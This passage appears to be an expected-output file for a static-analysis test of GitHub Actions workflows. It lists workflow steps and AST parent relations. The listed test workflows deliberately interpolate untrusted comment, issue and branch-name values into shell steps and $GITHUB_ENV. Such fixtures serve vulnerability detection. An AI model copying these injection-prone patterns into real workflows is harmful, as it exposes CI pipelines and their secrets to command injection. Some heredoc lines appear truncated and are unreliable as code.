.github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | 
Run Step | .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | -| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:36:14:36:86 
| sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | -| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | -| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | -| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | -| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -parentNodes -| 
.github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | -| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | -| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | 
.github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo 
'${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ 
github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo 
'${{github.event.issue.body}}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | -| .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | -| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | -| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | -| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | -| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| 
.github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:30:9:34:6 | Run Step | -| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:41:14:45:14 | cat > 
issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| 
.github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a 
$GITHUB_ENV\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:66:9:71:6 | Run Step | -| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho 
"status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | 
.github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:9:34:6 | Run Step | -| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:40:9:46:6 | Run Step | -| 
.github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:1:1:89:29 | on: | -| 